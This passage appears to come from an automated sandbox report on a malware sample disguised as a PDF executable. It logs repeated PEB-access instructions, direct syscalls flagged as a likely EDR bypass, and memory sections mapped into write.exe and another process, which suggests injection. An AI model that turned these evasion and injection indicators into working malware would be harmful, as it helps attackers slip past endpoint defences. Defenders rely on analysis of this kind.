Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B17128 mov eax, dword ptr fs:[00000030h] 2_2_36B17128
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36AE510D mov eax, dword ptr fs:[00000030h] 2_2_36AE510D
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36ADF113 mov eax, dword ptr fs:[00000030h] 2_2_36ADF113
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36ADF113 mov eax, dword ptr fs:[00000030h] 2_2_36ADF113
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36ADF113 mov eax, dword ptr fs:[00000030h] 2_2_36ADF113
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36ADF113 mov eax, dword ptr fs:[00000030h] 2_2_36ADF113
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36ADF113 mov eax, dword ptr fs:[00000030h] 2_2_36ADF113
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36ADF113 mov eax, dword ptr fs:[00000030h] 2_2_36ADF113
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36ADF113 mov eax, dword ptr fs:[00000030h] 2_2_36ADF113
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36ADF113 mov eax, dword ptr fs:[00000030h] 2_2_36ADF113
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36ADF113 mov eax, dword ptr fs:[00000030h] 2_2_36ADF113
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36ADF113 mov eax, dword ptr fs:[00000030h] 2_2_36ADF113
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36ADF113 mov eax, dword ptr fs:[00000030h] 2_2_36ADF113
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36ADF113 mov eax, dword ptr fs:[00000030h] 2_2_36ADF113
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36ADF113 mov eax, dword ptr fs:[00000030h] 2_2_36ADF113
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36ADF113 mov eax, dword ptr fs:[00000030h] 2_2_36ADF113
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36ADF113 mov eax, dword ptr fs:[00000030h] 2_2_36ADF113
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36ADF113 mov eax, dword ptr fs:[00000030h] 2_2_36ADF113
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36ADF113 mov eax, dword ptr fs:[00000030h] 2_2_36ADF113
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36ADF113 mov eax, dword ptr fs:[00000030h] 2_2_36ADF113
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36ADF113 mov eax, dword ptr fs:[00000030h] 2_2_36ADF113
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36ADF113 mov eax, dword ptr fs:[00000030h] 2_2_36ADF113
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36ADF113 mov eax, dword ptr fs:[00000030h] 2_2_36ADF113
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B0510F mov eax, dword ptr fs:[00000030h] 2_2_36B0510F
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B0510F mov eax, dword ptr fs:[00000030h] 2_2_36B0510F
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B0510F mov eax, dword ptr fs:[00000030h] 2_2_36B0510F
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B0510F mov eax, dword ptr fs:[00000030h] 2_2_36B0510F
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B0510F mov eax, dword ptr fs:[00000030h] 2_2_36B0510F
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B0510F mov eax, dword ptr fs:[00000030h] 2_2_36B0510F
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B0510F mov eax, dword ptr fs:[00000030h] 2_2_36B0510F
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B0510F mov eax, dword ptr fs:[00000030h] 2_2_36B0510F
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B0510F mov eax, dword ptr fs:[00000030h] 2_2_36B0510F
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B0510F mov eax, dword ptr fs:[00000030h] 2_2_36B0510F
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B0510F mov eax, dword ptr fs:[00000030h] 2_2_36B0510F
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B0510F mov eax, dword ptr fs:[00000030h] 2_2_36B0510F
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B0510F mov eax, dword ptr fs:[00000030h] 2_2_36B0510F
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B3717A mov eax, dword ptr fs:[00000030h] 2_2_36B3717A
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B3717A mov eax, dword ptr fs:[00000030h] 2_2_36B3717A
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B1716D mov eax, dword ptr fs:[00000030h] 2_2_36B1716D
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36BB3157 mov eax, dword ptr fs:[00000030h] 2_2_36BB3157
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36BB3157 mov eax, dword ptr fs:[00000030h] 2_2_36BB3157
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36BB3157 mov eax, dword ptr fs:[00000030h] 2_2_36BB3157
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36BB5149 mov eax, dword ptr fs:[00000030h] 2_2_36BB5149
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B7D140 mov eax, dword ptr fs:[00000030h] 2_2_36B7D140
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B7D140 mov eax, dword ptr fs:[00000030h] 2_2_36B7D140
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B7314A mov eax, dword ptr fs:[00000030h] 2_2_36B7314A
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B7314A mov eax, dword ptr fs:[00000030h] 2_2_36B7314A
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B7314A mov eax, dword ptr fs:[00000030h] 2_2_36B7314A
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B7314A mov eax, dword ptr fs:[00000030h] 2_2_36B7314A
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36AF1EB2 mov ecx, dword ptr fs:[00000030h] 2_2_36AF1EB2
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36AF1EB2 mov ecx, dword ptr fs:[00000030h] 2_2_36AF1EB2
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36AF1EB2 mov eax, dword ptr fs:[00000030h] 2_2_36AF1EB2
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36AF1EB2 mov ecx, dword ptr fs:[00000030h] 2_2_36AF1EB2
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36AF1EB2 mov ecx, dword ptr fs:[00000030h] 2_2_36AF1EB2
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36AF1EB2 mov eax, dword ptr fs:[00000030h] 2_2_36AF1EB2
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36AF1EB2 mov ecx, dword ptr fs:[00000030h] 2_2_36AF1EB2
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36AF1EB2 mov ecx, dword ptr fs:[00000030h] 2_2_36AF1EB2
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36AF1EB2 mov eax, dword ptr fs:[00000030h] 2_2_36AF1EB2
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36AF1EB2 mov ecx, dword ptr fs:[00000030h] 2_2_36AF1EB2
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36AF1EB2 mov ecx, dword ptr fs:[00000030h] 2_2_36AF1EB2
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36AF1EB2 mov eax, dword ptr fs:[00000030h] 2_2_36AF1EB2
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36BB7EA4 mov eax, dword ptr fs:[00000030h] 2_2_36BB7EA4
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36BB7EA4 mov ecx, dword ptr fs:[00000030h] 2_2_36BB7EA4
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36BB7EA4 mov eax, dword ptr fs:[00000030h] 2_2_36BB7EA4
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36BB7EA4 mov eax, dword ptr fs:[00000030h] 2_2_36BB7EA4
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B0BE80 mov eax, dword ptr fs:[00000030h] 2_2_36B0BE80
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B83EFC mov eax, dword ptr fs:[00000030h] 2_2_36B83EFC
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36AE3EE2 mov eax, dword ptr fs:[00000030h] 2_2_36AE3EE2
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B11EED mov eax, dword ptr fs:[00000030h] 2_2_36B11EED
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B11EED mov eax, dword ptr fs:[00000030h] 2_2_36B11EED
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B11EED mov eax, dword ptr fs:[00000030h] 2_2_36B11EED
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B1BED0 mov eax, dword ptr fs:[00000030h] 2_2_36B1BED0
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36BA9ED2 mov eax, dword ptr fs:[00000030h] 2_2_36BA9ED2
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B87ED0 mov ecx, dword ptr fs:[00000030h] 2_2_36B87ED0
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B21ED8 mov eax, dword ptr fs:[00000030h] 2_2_36B21ED8
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36BB5ECF mov eax, dword ptr fs:[00000030h] 2_2_36BB5ECF
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B67EC3 mov eax, dword ptr fs:[00000030h] 2_2_36B67EC3
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B67EC3 mov ecx, dword ptr fs:[00000030h] 2_2_36B67EC3
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B75E30 mov eax, dword ptr fs:[00000030h] 2_2_36B75E30
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B75E30 mov ecx, dword ptr fs:[00000030h] 2_2_36B75E30
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B75E30 mov eax, dword ptr fs:[00000030h] 2_2_36B75E30
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B75E30 mov eax, dword ptr fs:[00000030h] 2_2_36B75E30
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B75E30 mov eax, dword ptr fs:[00000030h] 2_2_36B75E30
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B75E30 mov eax, dword ptr fs:[00000030h] 2_2_36B75E30
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B5FE1F mov eax, dword ptr fs:[00000030h] 2_2_36B5FE1F
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B5FE1F mov eax, dword ptr fs:[00000030h] 2_2_36B5FE1F
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B5FE1F mov eax, dword ptr fs:[00000030h] 2_2_36B5FE1F
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B5FE1F mov eax, dword ptr fs:[00000030h] 2_2_36B5FE1F
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36AE3E01 mov eax, dword ptr fs:[00000030h] 2_2_36AE3E01
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36ADBE18 mov ecx, dword ptr fs:[00000030h] 2_2_36ADBE18
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36AE3E14 mov eax, dword ptr fs:[00000030h] 2_2_36AE3E14
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36AE3E14 mov eax, dword ptr fs:[00000030h] 2_2_36AE3E14
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36AE3E14 mov eax, dword ptr fs:[00000030h] 2_2_36AE3E14
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B17E71 mov eax, dword ptr fs:[00000030h] 2_2_36B17E71
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36ADBE60 mov eax, dword ptr fs:[00000030h] 2_2_36ADBE60
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36ADBE60 mov eax, dword ptr fs:[00000030h] 2_2_36ADBE60
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36AE1E70 mov eax, dword ptr fs:[00000030h] 2_2_36AE1E70
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B5DE50 mov eax, dword ptr fs:[00000030h] 2_2_36B5DE50
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B5DE50 mov eax, dword ptr fs:[00000030h] 2_2_36B5DE50
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B5DE50 mov ecx, dword ptr fs:[00000030h] 2_2_36B5DE50
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B5DE50 mov eax, dword ptr fs:[00000030h] 2_2_36B5DE50
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B5DE50 mov eax, dword ptr fs:[00000030h] 2_2_36B5DE50
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36ADDE45 mov eax, dword ptr fs:[00000030h] 2_2_36ADDE45
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36ADDE45 mov ecx, dword ptr fs:[00000030h] 2_2_36ADDE45
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36ADFE40 mov eax, dword ptr fs:[00000030h] 2_2_36ADFE40
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36BB5E56 mov eax, dword ptr fs:[00000030h] 2_2_36BB5E56
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36AE1FAA mov eax, dword ptr fs:[00000030h] 2_2_36AE1FAA
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B0BF93 mov eax, dword ptr fs:[00000030h] 2_2_36B0BF93
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B5FFDC mov eax, dword ptr fs:[00000030h] 2_2_36B5FFDC
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B5FFDC mov eax, dword ptr fs:[00000030h] 2_2_36B5FFDC
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B5FFDC mov eax, dword ptr fs:[00000030h] 2_2_36B5FFDC
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B5FFDC mov ecx, dword ptr fs:[00000030h] 2_2_36B5FFDC
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B5FFDC mov eax, dword ptr fs:[00000030h] 2_2_36B5FFDC
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B5FFDC mov eax, dword ptr fs:[00000030h] 2_2_36B5FFDC
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36ADBFC0 mov eax, dword ptr fs:[00000030h] 2_2_36ADBFC0
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B99FD6 mov eax, dword ptr fs:[00000030h] 2_2_36B99FD6
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36AD9FD0 mov eax, dword ptr fs:[00000030h] 2_2_36AD9FD0
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B61FC9 mov eax, dword ptr fs:[00000030h] 2_2_36B61FC9
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B61FC9 mov eax, dword ptr fs:[00000030h] 2_2_36B61FC9
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B61FC9 mov eax, dword ptr fs:[00000030h] 2_2_36B61FC9
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B61FC9 mov eax, dword ptr fs:[00000030h] 2_2_36B61FC9
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B61FC9 mov eax, dword ptr fs:[00000030h] 2_2_36B61FC9
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B61FC9 mov eax, dword ptr fs:[00000030h] 2_2_36B61FC9
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B61FC9 mov eax, dword ptr fs:[00000030h] 2_2_36B61FC9
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B61FC9 mov eax, dword ptr fs:[00000030h] 2_2_36B61FC9
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B61FC9 mov eax, dword ptr fs:[00000030h] 2_2_36B61FC9
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B61FC9 mov eax, dword ptr fs:[00000030h] 2_2_36B61FC9
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B61FC9 mov eax, dword ptr fs:[00000030h] 2_2_36B61FC9
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B61FC9 mov eax, dword ptr fs:[00000030h] 2_2_36B61FC9
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B61FC9 mov eax, dword ptr fs:[00000030h] 2_2_36B61FC9
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B61FC9 mov eax, dword ptr fs:[00000030h] 2_2_36B61FC9
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B61FC9 mov eax, dword ptr fs:[00000030h] 2_2_36B61FC9
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36AFDF36 mov eax, dword ptr fs:[00000030h] 2_2_36AFDF36
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36AFDF36 mov eax, dword ptr fs:[00000030h] 2_2_36AFDF36

HIPS / PFW / Operating System Protection Evasion
barindex
Found direct / indirect Syscall (likely to bypass EDR)
Source: C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe NtAllocateVirtualMemory: Direct from: 0x7756480C Jump to behavior
Source: C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe NtClose: Direct from: 0x77562A8C
Source: C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe NtCreateKey: Direct from: 0x77562B8C Jump to behavior
Source: C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe NtSetInformationThread: Direct from: 0x77562A6C Jump to behavior
Source: C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe NtQueryAttributesFile: Direct from: 0x77562D8C Jump to behavior
Source: C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe NtOpenKeyEx: Direct from: 0x77562ABC Jump to behavior
Source: C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe NtQueryInformationProcess: Direct from: 0x77562B46 Jump to behavior
Source: C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe NtResumeThread: Direct from: 0x77562EDC Jump to behavior
Source: C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe NtCreateUserProcess: Direct from: 0x7756363C Jump to behavior
Source: C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe NtProtectVirtualMemory: Direct from: 0x77562EBC Jump to behavior
Source: C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe NtWriteVirtualMemory: Direct from: 0x7756482C Jump to behavior
Source: C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe NtDelayExecution: Direct from: 0x77562CFC Jump to behavior
Source: C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe NtWriteVirtualMemory: Direct from: 0x77562D5C Jump to behavior
Source: C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe NtMapViewOfSection: Direct from: 0x77562C3C Jump to behavior
Source: C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe NtResumeThread: Direct from: 0x775635CC Jump to behavior
Source: C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe NtAllocateVirtualMemory: Direct from: 0x77562B1C Jump to behavior
Source: C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe NtReadFile: Direct from: 0x775629FC Jump to behavior
Source: C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe NtQuerySystemInformation: Direct from: 0x77562D1C Jump to behavior
Source: C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe NtSetInformationProcess: Direct from: 0x77562B7C Jump to behavior
Source: C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe NtNotifyChangeKey: Direct from: 0x77563B4C Jump to behavior
Source: C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe NtOpenFile: Direct from: 0x77562CEC Jump to behavior
Source: C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe NtAllocateVirtualMemory: Direct from: 0x77563BBC Jump to behavior
Source: C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe NtSetInformationThread: Direct from: 0x77556319 Jump to behavior
Source: C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe NtQueryInformationToken: Direct from: 0x77562BCC Jump to behavior
Source: C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe NtReadVirtualMemory: Direct from: 0x77562DAC Jump to behavior
Source: C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe NtCreateFile: Direct from: 0x77562F0C Jump to behavior
Source: C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe NtProtectVirtualMemory: Direct from: 0x77557A4E Jump to behavior
Source: C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe NtQueryVolumeInformationFile: Direct from: 0x77562E4C Jump to behavior
Source: C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe NtDeviceIoControlFile: Direct from: 0x77562A0C Jump to behavior
Source: C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe NtQuerySystemInformation: Direct from: 0x775647EC Jump to behavior
Source: C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe NtAllocateVirtualMemory: Direct from: 0x77562B0C Jump to behavior
Source: C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe NtOpenSection: Direct from: 0x77562D2C Jump to behavior
Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Section loaded: NULL target: C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Section loaded: NULL target: C:\Windows\SysWOW64\write.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\write.exe Section loaded: NULL target: C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\write.exe Section loaded: NULL target: C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe protection: execute and read and write Jump to behavior
